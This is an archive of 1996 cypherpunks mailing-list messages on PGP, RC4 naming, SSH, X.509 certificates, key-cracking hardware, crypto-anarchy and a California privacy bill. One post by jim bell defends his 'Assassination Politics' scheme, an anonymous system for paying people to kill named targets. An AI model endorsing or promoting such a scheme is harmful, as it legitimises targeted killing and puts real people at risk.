PXh8QEDdmaYPmVTnw++2TZTJtWosPvn0g/zgpAqPVy5ibVJ03dzdToAj2+2vjdxF
j9zauQHsvxQ=
=xLqm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 27 Feb 1996 11:43:31 +0800
To: cypherpunks@toad.com
Subject: Re: Ass. Politics
Message-ID: <m0trFfq-000922C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:51 PM 2/25/96 -0500, David R. Conrad wrote:
>
>Salman Rushdie, in a speech I heard several years ago, said that it was
>widely doubted that Iran would or could actually come up with the three
>million dollar bounty on his head.
>This may play a large part in why he is still around.

A few people who basically seem to oppose my idea ("Assassination Politics") 
try to use the Rushdie example as being some sort of "evidence" why it 
wouldn't work.  ("If Rushdie is alive years later, with a few million on his 
head, that proves assassination doesn't work...")   

I, on the contrary, believe that it actually SUPPORTS my theory:  Clearly, 
nobody has trusted Iran's leadership enough to genuinely believe he would be 
able to collect the reward, and thus the apparently size of the reward is 
discounted in people's minds.

When I respond to these objectors, I point out that if Iran was REALLY 
serious about expecting to see Rushdie dead, they would have long ago set up 
some sort of system, analogous to AsPol, that would allow an anonymous 
assassin to kill Rushdie and collect the reward, guaranteed, without risk of 
exposure.  Clearly, that hasn't happened.  (I think we would have heard 
about it if it had.)   This doesn't make the Iranians any more "civilized," 
obviously, it just means that they are either less competent or trustworthy 
about achieving their goals (or are seen to be so), or that they really don't 
want to/can't pay anybody the money for Rushdie's death.

I don't recall every seeing anyone even attempt to contradict this 
counter-argument; they always agree that nobody really believes anyone can 
safely and reliably collect the Rushdie reward.  Needless to say, this 
raises serious doubts  about the competence of many objectors to critically 
analyze the issues in AsPol.  


It would be interesting to get Rushdie's opinion about AsPol.  
It's understandable if he had an initial feeling of revulsion about 
such a system, on the other hand he should recognize that this system would 
also allow opponents of the Iranian government to eliminate those who called 
for his death in the first place.  It is reasonable to suppose that had this 
system been functioning years ago, Iran's government would have been taken 
down long ago.

>I think all the analyses of the economic costs of protecting one person
>vs. protecting many people are rather beside the point, in light of this.

I agree.  AsPol will work even if a few people can be protected, and 
protecting many people is simply not an option.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTJ0NPqHVDBboB2dAQGLmAP/dAPz0FrZNT12NjEvkXuXm5JHVbdJPwDq
JhwDBTAReTOirpNJ8mcgn8KN4hsL5rK5Qwyp+7YO3xRPMh39HPH2uBpq63/RZn2p
uu7eXmrR4HQMKhuK5XReYJtARdPdTgL/F3cmMr1TNUW7M+aJikGo4b1OEycIYNdo
Aa1o/peUXlw=
=059O
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 27 Feb 1996 13:18:19 +0800
To: cypherpunks@toad.com
Subject: [South SF Bay Area] PLAY ANNOUNCEMENT: "Breaking the Code" (fwd)
Message-ID: <Pine.ULT.3.91.960226210151.7108A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


FYI. Might be amusing. I'll probably go, if I can find a free moment.

-rich
 The Dream Team

---------- Forwarded message ----------
Date: 25 Feb 1996 20:55:33 -0500
From: Michael Deleon <deleon@rahul.net>
Newgroups: ba.announce, ba.motss, rec.arts.theatre.plays
Subject: PLAY ANNOUNCEMENT: "Breaking the Code"

Menlo Players Guild Presents

BREAKING THE CODE
by Hugh Whitemore
Based on the Book: Alan Turing: The Enigma by Andrew Hodges

The private life of an extraordinary and brilliant man becomes the means of
his destruction in this dramatic story, which won acclaim on Broadway. At its
center is Alan Turing, the mathematician and British war hero who broke the
famous German Enigma Code, giving the Allies the key to winning World War II,
and yet was persecuted by his government for his sexual orientation. This
portrait of a complex, visionary man torn by society's conflicting rules is
chillingly powerful.

February 23 - March 16
Thurs-Sat, 8pm
Sunday March 10 at 2:30
Burgess Theatre, 601 Laurel Street, Menlo Park

Tickets and info call
(415) 322-3261

Visit our web page at http://www.best.com/~carjack




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Tue, 27 Feb 1996 10:42:35 +0800
To: cypherpunks@toad.com
Subject: Re: Remember, RC4 is now PC1 (fwd)
Message-ID: <199602270208.VAA20323@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> > >>From now, instead of saying "RC4" let us say "PC1, (formerly known as RC4)"
> > >Every time you say RC4 without saying "Trademark of some bunch of 
> > >lawyer scum" you theoretically break the lawyer made law.  So let us 
> > >stop doing it.   Serve them right.
> > 
> > You can always call it "Ron's Code 4" or "Rivest's Code 4" or whatever.
> 
> Call it  "Prince"

The latest version of ssh has something named "arcfour, which is a
cipher based on a usenet posting in Spring-1995.  It is widely
believed and has been tested to be equivalent with RC4.  (RC4 is a
trademark of RSA Data Security."

This cipher was added when the RC4 support was removed.

Wink, wink.

-- 
Mike Gebis  gebis@ecn.purdue.edu 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 27 Feb 1996 13:55:26 +0800
To: cypherpunks@toad.com
Subject: Re: Remember, RC4 is now PC1 (fwd)
Message-ID: <2.2.32.19960227054213.008b030c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 2/26/96 -0500, you wrote:

>The latest version of ssh has something named "arcfour, which is a
>cipher based on a usenet posting in Spring-1995.  It is widely
>believed and has been tested to be equivalent with RC4.  (RC4 is a
>trademark of RSA Data Security."

Then they will get sued by SeaWare saying it conflicts with their trademark
for .arc format compression.

Maybe someone should go into the business of "Trademark Collision
Insurance(tm)".  It seems that no matter what you do, everything(tm) is
trademarked nowadays.  

(TCMAY(tm) and "Cypherpunks(tm)" are a trademark of "Tentacles R Us(tm)", a
division of "Evil Incarnate International(tm)".)

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 28 Feb 1996 17:05:14 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
Message-ID: <199602280417.XAA11930@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins wrote:

> PGP3, which I've been working on with Colin Plumb for some time, is
> based upon a specified API.  Although the API is still under
> development, the plan is to have libraries available for UNIX, Mac,
> and Windows (DLL).
> 
> At this time the API Spec and Programmer's Guide documents are not
> publically available.  Hopefully this will change in the next few
> weeks.

Odd. I remember a prototype API spec being posted to c'punks last 
year.  (Or was that something else?)

And, what does this have to do with ViaCrypt PGP 4.0? Would it be 3.0 
compatible or is it something entirely different?

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 27 Feb 1996 12:35:27 +0800
To: cypherpunks@toad.com
Subject: RC
Message-ID: <960226225732.2022bf08@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


And might I point out that "RC" has been the registered trademark of
the Royal Crown Bottling Company since long before Mr. R...

							P.fla




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 27 Feb 1996 16:24:43 +0800
To: cypherpunks@toad.com
Subject: Re: Ass. Politics
Message-ID: <v02120d04ad586cd3fac4@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 PM 2/26/96, jim bell wrote:

>>Salman Rushdie, in a speech I heard several years ago, said that it was
 <...>
>A few people who basically seem to oppose my idea ("Assassination Politics")
>try to use the Rushdie example as being some sort of "evidence" why it


   Has anyone considered using jim bell as a source of randomness?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 27 Feb 1996 18:33:57 +0800
To: cypherpunks@toad.com
Subject: SSH for Windows update?
Message-ID: <199602271011.FAA16034@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


The SSH Windows client stopped working on Feb. 9.  Anyone either have
another version that works now or another SSH client for Windows?  Anyone
know if Tatu's client is ready yet?  Thanks in advance. :)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Tue, 27 Feb 1996 12:47:58 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <31328ba3.29715249@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 25 Feb 1996 22:48:51 -0600 (CST), you wrote:

>On the 23rd, Jeff Weinstein said this concerning the natural 
>semi-anonymity of the net:
>
>> Given that verisign and others will soon begin issuing large numbers of
>> certificates that do not guarantee the identity of the key holder, it seems
>> that this tradition will continue even with the wide deployment of X509 
>> certs.
>
>This has been bugging me since I read it.  I'm not sure I understand the 
>plan;  it only makes sense to me if "anonymous" X.509 certs are issued 
>for user authentication only, not for server authentication.  Is that 
>what this is about?
>
>(If anonymous certs are issued for servers, why should such a cert be 
>treated any differently than one I generate on my own, which causes 
>warning screens about an unknown CA to pop up?)

Verisign will offer a number of levels of certificates.  The
certificate that Jeff refered to requires only a unique email address
and is available for free.  For obvious reasons you should not trust
theses keys for credit card information or anything else that you feel
is confidential.  This is why Navigator allows you configure what keys
you accept as well as what certifications you will accept.


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 28 Feb 1996 00:28:48 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Numbers don't lie...
Message-ID: <199602271527.HAA15152@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 AM 2/18/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>The second point is that their scalability seems to be based on costs per
>chip alone, cost for which the engineering cost has been recovered and for
>which the yeild is significant, hardly givens when you are talking pushing
>the state of the art, given this 200 Mhz Pentiums would be U$10.00 also
>(well, maybe U$25.00).


Doubtless that is why they assume chips that are very far from state of the art:

Since interprocess communication is trivial for key cracking, 
you are better off using large numbers of cheap chips, than 
smaller numbers of good chips.

>Finally, no cost is allocated to the sustem required to program/evaluate
>the ponderings of these 100's of ASICs. As anyone who has ever programmed
>a massively parallel computer (which is what they are talking about in their
>brute force machine, it is the boundary communications that kill you.

Again:  Interprocess communication is trivial.  A brute force key cracking
machine is *not* a general purpose massively parallel computer.

Suppose you have a million chips.  Each chip tries keys.  A few bytes 
of the plaintext, headers and stuff are known.  Assume eight bytes known.  
Then we could handle the interprocess communication with a single desktop 
computer.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Bainter <Mark@adspp.com>
Date: Wed, 28 Feb 1996 12:29:19 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Remember, RC4 is now PC1
In-Reply-To: <Pine.SOL.3.91.960226152809.22559B-100000@chivalry>
Message-ID: <31332C27.4D0@adspp.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> 
> On Mon, 26 Feb 1996, Bill Stewart wrote:
> 
> > At 10:19 AM 2/24/96 -0800, jamesd@echeque.com wrote:
> > >>From now, instead of saying "RC4" let us say "PC1, (formerly known as RC4)"
> > ..
> > >Every time you say RC4 without saying "Trademark of some bunch of
> > >lawyer scum" you theoretically break the lawyer made law.  So let us
> > >stop doing it.   Serve them right.
> >
> > You can always call it "Ron's Code 4" or "Rivest's Code 4" or whatever.
> 
> Call it  "Prince"
> 

Call it "the cipher formerly known as 'RC4'"



---
"Man did not enter into society to become 
 worse than he was before, nor to have 
 fewer rights than he had before, but
 to have those rights better secured." 
             --- Thomas Paine 1791




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 27 Feb 1996 22:46:58 +0800
To: cypherpunks@toad.com
Subject: PHO_ton
Message-ID: <199602271408.JAA10507@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New Scientist, 24 February 1996:

   "Trick of the light fools forgers."

      Researchers at U-Conn Storrs are developing security
      systems that use a new kind of invisible code -- the
      phase of light. A transparent phase mask over a photo on
      a credit card would make it very difficult to forge. The
      authenticity of the card is checked by a reader composed
      of a laser light source and a device called an optical
      correlator. Bahram Javidi, leading Storrs researcher,
      will publish the latest findings in SPIE proceedings,
      called "Optical Security and Counterfeit Deterrent
      Techniques" (v 2659).

   "Good connections, quantum style."

      For quantum computers of the future, any "noise" in the
      connection between sender and receiver could prove
      disastrous. The problem is that the data in such
      computers will be held in the form of individual photons
      and, since quantum theory states that they cannot be
      checked because the mere act of measuring them will
      transform them, every error that creeps in will go
      uncorrected. Now IBM researchers have come up with a way
      to make the connection crystal clear (PRL, v 76, p 722).
      [Cf. recent thread "IBM's Breakthrough."]
 

   PHO_ton












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 28 Feb 1996 03:59:19 +0800
To: cypherpunks@toad.com
Subject: [NOISE]  Re: Perl T-shirt makes the big time
In-Reply-To: <199602271359.OAA20773@utopia.hacktic.nl>
Message-ID: <pyzMx8m9LItF085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199602271359.OAA20773@utopia.hacktic.nl>,
anon-remailer@utopia.hacktic.nl (Anonymous) wrote:

> Spotted in an NSA contractor's office: a column from InfoWeek or some
> such rag about the RSA-Perl T-shirt. Said column hijacked May's idea
> that shirting was trivial and turned it on ear-- ITAR is routinely being
> violated and no one cares.
> 
> NSA-heads said they got article by fax from the Death Star in Ft. Meade.
> Wonder how many black-clad Perl-toters there are on the reservation.
> 

Maybe someone should ask the t-shirt makers just how many of them have been 
shipped to the Beltway area. . . . 

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTM9TuVevBgtmhnpAQEeRAL/anWIiUDhxLpkeO8Dj2Ly4fLMkQVvUxpc
X1/IamR0tA3bbwEO266suW8D5vQU7Xq789Q0StF3uyBIpUc+WhXnmJsZSz+9u5Ki
wGg+Cp+Kzlx1LioWe1mfH92Rby6QRPKO
=GhXM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 28 Feb 1996 03:29:17 +0800
To: drake@servidor.dgsca.unam.mx>
Subject: Re: CDA Strikes.
In-Reply-To: <31317B14.8E1@servidor.unam.mx>
Message-ID: <AlAmrO200YUuI=8iUS@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


This article is incorrect in at least two ways.

First, last week the U.S. Government signed a legally binding contract
saying they won't prosecute anyone under the CDA until the hearings are
over. This relates to both the indeceny or "patently offensive"
provisions -- *and* the DoJ has said they won't even *initiate*
investigations.

Second, *if* the law is upheld, the DoJ's first, and second, and third,
choices of plaintiffs will be unpopular figures that will play well on
the evening news. The U.S. understands the value of divide-and-conquer.
At the same time, a court challenge will be easier if someone is
actually prosecuted...

-Declan




Excerpts from internet.cypherpunks: 26-Feb-96 CDA Strikes. by Ludwig von
D. III@servid 
> >           President Clinton won't enforce the law" crowd, Friday
marked the 
> first arrest
> >           under the new law. They picked an unsympathetic figure,
twice befo
> re
> >           convicted child pornographer, and got him for illegal data
transmi
> ssion over
> >           the Internet. 
>  
> >           Next time it won't be such an unsympathetic figure. It
will be som
> e ISP,
> >           minding their own business, not knowing they have a user
that didn
> 't read the
> >           rules. They'll spend a year in federal court, defending
their post
> ion based on






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 28 Feb 1996 03:32:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Conference report - resolving security workshop
In-Reply-To: <199602240738.XAA15151@ix3.ix.netcom.com>
Message-ID: <199602271616.LAA27821@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:
# Earlier, I mentioned that two and a half protocols survived the
# day. The remaining one is MSP. It's actually not a bad protocol.

It appears to have been designed by the NSA, so that's not surprising in some
senses. The question is, I think, how much baggage does it bring that's
not really relevant for civilian/commerical use ?

Debate about the use of sensitivity labels has recently resurfaced on the
IPSEC list, although opinion seems to be running quite heavily in favor of
implementing them (at the network layer) so far. 

Bill Stewart writes:
> Where can we find the new specs for MSP?  

With some help from Howard Weiss of Sparta Secure Systems Eng. (in MD), I
finally found an online version. It's in 5 parts, accessible from 
http://bbs.itsi.disa.mil:5580/T3563 (look for MIL-STD-2045-18500). The
web site is set up so as to make it a major pain to cut-and-paste or easily
remember the precise URLs. They're zipped WordPerfect files, so I can't
read them. If someone constructs a copy in ASCII or PostScript or HTML or
something, let me know. 

According to http://www.itsi.disa.mil/dodiis/sec2-62.html, you can read
about MSP in one of the Secure Data Network System (SDNS) Key Management 
Documents (NISTIR 90-4262). MSP is apparently (supposed to be) used in the DMS
(Defense Message System). I think you can order hardcopy of such things from
NIST.

I found an archive of old traffic from the pem-dev list about a
"Preliminary" MSP at:

http://www.eff.org/pub/Privacy/Security/Crypto_misc/dod_pmsp_sdns.standards

-Lewis					"Shit !" -Pres. Richard M. Nixon, 1973




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 28 Feb 1996 04:01:13 +0800
To: cypherpunks@toad.com
Subject: VAN_goh
Message-ID: <199602271809.NAA25003@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-26-96. FT:

   "Net's rivals feel the squeeze. A quiet revolution is
   transforming global electronic trade."

      Value added networks (Vans) such as GEIS and Advantis
      are already at risk from the Internet, according to
      Price Waterhouse's *Technology Forecast*, a panoramic
      sweep through today's electronics, from chip designs to
      video compression software. Electronic commerce, the
      forecast says, has become a worldwide phenomenon,
      reshaping marketplaces, trading relationships and
      international trading boundaries.

   2-27-96. NYT:

   "AT&T Makes Belated Move On Internet." John Markoff.

      AT&T is to introduce a service Tuesday that it hopes to
      use to link millions of its long-distance telephone
      customers to the global computer network. Analysts said
      the entry by AT&T was certain to alter the competitive
      landscape for ISPs. It will offer relatively inexpensive
      dial-up access to the Internet and the Web to personal
      computer users at home. Company officials said pricing
      will "be aggressive enough to make the industry sit up
      and take notice." "You're about to see a new AT&T," said
      an analyst. The service will use Netscape for browsing
      and a search tool designed by Verity Inc.

   VAN_goh






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 28 Feb 1996 04:02:02 +0800
To: cypherpunks@toad.com
Subject: "Physical Reality"
Message-ID: <2.2.32.19960227181316.0070e158@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 2/21/96 -0800, L. Detweiler wrote:

>Barlow brings up this topic in his recent "cyberspace declaration of
>independence" (which can clearly be criticized as out of touch with 
>physical reality but is nevertheless compelling). 

Various critics of cryptoanarchy from D. Denning to L. Detweiler to A.
Grove, to J. Kellstrom to the 1991 instance of P. Metzger have argued that
the continued existence of the physical attack medium renders this new form
of social disorganization DOA.

Boiled down to its essentials, this argument can be expressed by the lyrics
of the song "Bad Boys" as used as the theme song of the reality TV show
"Cops."  For those who no longer participate in the previous culture, they are:

Bad Boys, Bad Boys
Whatcha gonna do? 
Whatcha gonna do when they come for you? 
Bad Boys, Bad Boys

repeat endlessly.

I would suggest instead that the critics of cryptoanarchy are out of touch
with "physical reality."

For the "Bad Boys" to come for you, a whole series of requirements must be
in place:

1)  There must be Bad Boys
2)  They must be able to travel
3)  There must be a reason for them to come "for you".  They need motivation
4)  There must be a you
5)  The Bad Boys must know where you are
6)  The Bad Boys must be able to travel to where you are
7)  The answer to the question "Whatcha gonna do?" must be "nothing" (This
would seem to be implied by the song.)
8)  They must have something to do to you when they "come for you" otherwise
the journey is a waste of time.

Let's examine each of these requirements to see how technological change has
affected them.

1)  There must be Bad Boys

There are fewer Bad Boys these days.  Not that Human Nature has improved all
that much but law enforcement employment (relative to population) is down.
The collapse of the SU and the Eastern European police states has
dramatically reduced the world population of government agents.  When 1/4 of
your population was in the enforcement business full- or part-time (as in
the DDR), the end of that system reduces the supply of "muscle."  Note that
during this Century of Blood, governments were murdering someone every 20
seconds or so (160 million in the last 100 years).  Reports indicate that
the death rate is lower these days.  Occasional minutes go by without any
murders by government.  

Additionally, even in places like the US where there would seem to be more
enforcement personnel employed than ever before, bureaucratic management has
worked to reduce worker productivity.  Since law enforcement is still
organized along Stalinist lines (state ownership and management,
hierarchical organization, pay unrelated to performance), not much actual
enforcement is undertaken.  A New York Times article on INS agents whose job
it is to find and arrest illegals within the US said that they were allowed
to grab about one perp a month.  The rest of the time was spent on
paperwork.  At the rate of 12 deportations a year per agent, it will be
quite a while before the backlog is cleared.  And, indeed, all the evidence
we have from studies of the "clearance" rates of crimes to the street price
of illegal pharmacuticals, to the "average time served per crime" suggest
that effective enforcement is down.

This is what we would expect since the law enforcement system has retained a
very traditional organizational model while the rest of society has become
much more efficient.  A massive increase in what we might call "regulatory
targets" combined with a decrease in the number and efficiency of the
regulators, means less regulation and effectively fewer Bad Boys.

2)  They must be able to travel

If the Bad Boys are to come for you, they have to be able to travel.  The
internationalization of the modern business and communications environment
has made this more difficult.  There are very few enforcement agencies that
have unlimited budgets of the sort that allowed Lt. Gerard to chase Dr.
Richard Kimball around the country for years on end.  Enforcement is largely
a matter of chance.  The Bad Boys come for some small part of the criminal
population and leave the rest alone until chance brings them within reach.

A multinational investigation and enforcement program costs the earth.  It
will only be undertaken in very significant cases.  Nation states are still
the basic unit of enforcement and so jurisdictional conflicts cause many
costs and delays.  Since it is part of human nature to be more concerned
with one's own "stuff" than with other's "stuff," foreign enforcement
agencies won't pursue cases with as much energy as domestic agencies might
be willing to.  

One way that people are more powerful than governments is that people (or
their corporations) can be citizens/residents of several nations much more
easily than a single nation can rule the citizens/residents of other nations.

Even within the United States, jurisdictional differences among the states
can be exploited by natural or artificial persons.  As regional trading
blocks like NAFTA and the European Free Trade Area spread, people will be
able to move around much more easily than government agencies.  Since there
are no sovereignty issues raised when people do business in multiple
jurisdictions, these distance and jurisdictional barriers will fall much
faster for private parties than for the government Bad Boys who want to come
after them.

<More Tomorrow>

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 28 Feb 1996 13:57:53 +0800
To: prz@acm.org
Subject: PGP source code book sold out!
Message-ID: <9602272119.AA08088@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 27 Feb 96 15:22:21 EST
From: ehling@mitpress.mit.edu (Teresa A. Ehling)
Message-Id: <9602272022.AA06562@mitpress.mit.edu>
To: gnu@toad.com

Dear John --

The PGP Source Code book is now out of print.  We assumed there
would only be limited interest in the source code, so we printed
only 1500 copies.  When we sold out of this run (just last month), 
we decided not to reprint, given that the 3.0 release is due this spring.

Terry Ehling
The MIT Press




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Wed, 28 Feb 1996 08:56:59 +0800
To: jwarren@well.com (Jim Warren)
Subject: In favour of privacy legislation
In-Reply-To: <v02120d06ad57db40dd50@[206.15.66.121]>
Message-ID: <199602272202.OAA18522@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> The problem is the WILDLY broad/excessive scope of the legislation AS WRITTEN.

I agree that the legislation, as written, one of the shortest I've seen, 
is overbroad. However, it's not _that_ far off the mark. Most of your
objections (such as the one relating to unauthorised biographies, which 
are more likely to be challenged using existing libel laws than privacy 
legislation that doesn't specify penalties) can be answered with a simple
change: replace "personal information concerning an individual" with
"personal information concerning an individual directly gleaned from that
individual's statements or actions." Or something. So if you build
a database tracking my purchases at your store, or what I fill in
your subscription forms, you can't resell it. OTOH if you buy my
dossier from someone _else_, you're not liable, though your source
probably is. So you could publish biographies or political exposes
and only the primary source would be liable. That source is often 
liable in any case, due to existing laws concerning theft, trade secrets,
breach of contract etc; it's just that primary sources in these situations
are almost never identified.

> AS WRITTEN, it would prohibit --
> * making available for a fee, information about pedophiles, rapists, etc.,

Ah yes, this would include the 98.32% of Internet users who are paedophiles.
You don't believe that paedophiles and rapists deserve the same legal
and constitutional treatment as anyone else? "First they came for the Jews..."

> * maintaining a public-access database for profit, offering consumer
> information about landlords' abuses of security deposits -- or renters'
> abuses of property,
> * making available for profit, almost all information about individuals in
> public civil and criminal court records,

These, along with databases on (proven) rapists, depend on policy for
the use of "public" - government-held - information on individuals.
In most countries, this is governed by widely distributed regulations,
not any single privacy law. For example, the European restriction on
publicising names of minors charged for serious offences _during_ trial.
If the simple change on direct sources is made, these do not impact
privacy legislation.

> I have no problem with *carefully* constructed privacy protection.  But (1)
> that turns out to be VERY hard to construct, and (2) this bill ain't it.

Legislation governing free speech in the US is huge. The body of law
that strengthens free speech (interpreting "Congress shall make"
as "any level of government shall make") and restricts it (taking
"no law" to mean "no law except to prevent obscenity, libel, etc")
goes far beyond the deceptively simple First Amendment, but this 
complexity and bulk is not a common argument against free speech 
legislation. The California bill, with some changes, may not
be a carefully constructed body of law but could be a decent start.

My personal opinion, living as I do between one country - India - that is 
still (fortunately?) fond of habitual civil disobedience, and another - 
the Internet - where civil disobedience is a technologically assisted
state of mind, laws are an irritation. But if they are to exist to
protect _some_ rights, they should, for aesthetic balance if nothing
else, exist for _all_.

Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Wed, 28 Feb 1996 17:13:05 +0800
To: cypherpunks@toad.com
Subject: Privacy legislation in CA
Message-ID: <199602272208.OAA23091@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



I just forwarded my last post to some other list  favouring
- sort of - proposed privacy legislation in California. As
it may not have appeared here, and is very short, and I don't
have the URL, and I believe my response was relevant to
cpunks, I've reproduced the bill.

-Rishab

SB 1659 Personal rights: privacy.
BILL NUMBER: SB 1659                                      INTRODUCED
02/21/96
                               BILL TEXT



INTRODUCED BY  Senator Peace

                        FEBRUARY 21, 1996

   An act to add Section 43.2 to the Civil Code, relating to privacy.


                      LEGISLATIVE COUNSEL'S DIGEST


   SB 1659, as introduced, Peace.  Personal rights: privacy.
   Existing law, the California Constitution, provides that all
people have certain inalienable rights, including the right to
privacy.
   This bill would prohibit a person or corporation from using
or distributing for profit information concerning an individual,
including his or her credit history, finances, or medical
history, without his or her written consent. The bill would
include a statement of legislative findings concerning the right
to privacy.
   Vote:  majority.  Appropriation:  no.  Fiscal committee:  no.
State-mandated local program:  no.


  SECTION 1.  The Legislature hereby finds and declares the
following:
   (a) All people have an inalienable right to privacy as
declared in Section 1 of Article I of the California
Constitution.
   (b) Advances in technology have made it easier to create,
acquire, and analyze detailed personal information about an
individual.
   (c) Personal information, including information about a
person's financial history, shopping habits, medical history,
and travel patterns, is continuously being created.
   (d) The unauthorized use of personal information concerning
an individual is an infringement upon that individual's right to
privacy.
  SEC. 2.  Section 43.2 is added to the Civil Code, to read:
   43.2.  No person or corporation may use or distribute for
profit any personal information concerning a person without that
person's written consent.  Such information includes, but is
not limited to, an individual's credit history, finances,
medical history, purchases, and travel patterns.


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
